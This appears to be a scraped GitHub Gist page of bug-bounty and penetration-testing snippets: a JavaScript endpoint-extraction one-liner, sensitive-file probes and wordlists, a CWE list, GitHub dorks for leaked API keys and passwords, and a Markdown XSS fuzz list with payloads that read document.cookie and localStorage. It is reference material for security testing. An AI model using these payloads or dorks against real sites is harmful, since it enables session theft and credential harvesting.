Skip to content

Instantly share code, notes, and snippets.

@moodiabdoul3
moodiabdoul3 / st8out.sh
Created May 9, 2020
St8out - Extra one-liner for reconnaissance
View st8out.sh
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@moodiabdoul3
moodiabdoul3 / offsec.md
Created May 9, 2020
Penetrating Testing/Assessment Workflow
View offsec.md

Penetrating Testing/Assessment Workflow & other fun infosec stuff

https://github.com/jivoi/pentest

My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

@moodiabdoul3
moodiabdoul3 / ejs.sh
Created Apr 25, 2020 — forked from gwen001/ejs.sh
onliner to extract endpoints from JS files of a given host
View ejs.sh
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# debug mode and absolute/relative urls support (the best one):
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d
View Grep-For-Sensitive-Files
/.s3cfg | grep -Hnri "website_endpoint"
/phpunit.xml | grep -Hnri "<\phpunit"
/nginx.conf | grep -Hnri '/var/run/'
/.vimrc | grep -Hnri 'vim-'
/yarn.lock | grep -Hnri 'yarn lockfile'
/.idea/workspace.xml | grep -Hnri '<project version="4">'
/composer.json | grep -Hnri '"autoload"'
/Homestead.yaml | grep -Hnri 'provider: virtualbox'
/Vagrantfile | grep -Hnri 'VAGRANTFILE_API_VERSION'
/.ssh/known_hosts | grep -Hnri 'ssh-rsa'
View short-wordlist.txt
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore
@moodiabdoul3
moodiabdoul3 / all.txt
Created Jan 17, 2020 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@moodiabdoul3
moodiabdoul3 / vuln_list.txt
Created Jan 16, 2020 — forked from Lopseg/vuln_list.txt
150 vulnerability types that you can submit for. Thanks to @thecybermentor and hackerone.
View vuln_list.txt
Account Hijacking
Allocation of Resources Without Limits or Throttling - CWE-770
Array Index Underflow - CWE-129
Authentication Bypass Using an Alternate Path or Channel - CWE-288
Brute Force - CWE-307
Buffer Over-read - CWE-126
Buffer Underflow - CWE-124
Buffer Under-read - CWE-127
Business Logic Errors - CWE-840
Classic Buffer Overflow - CWE-120
View Markdown XSS fuzzlist
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
[XSS](javascript:prompt(document.cookie))
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
View github-recon
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password 
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://  
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces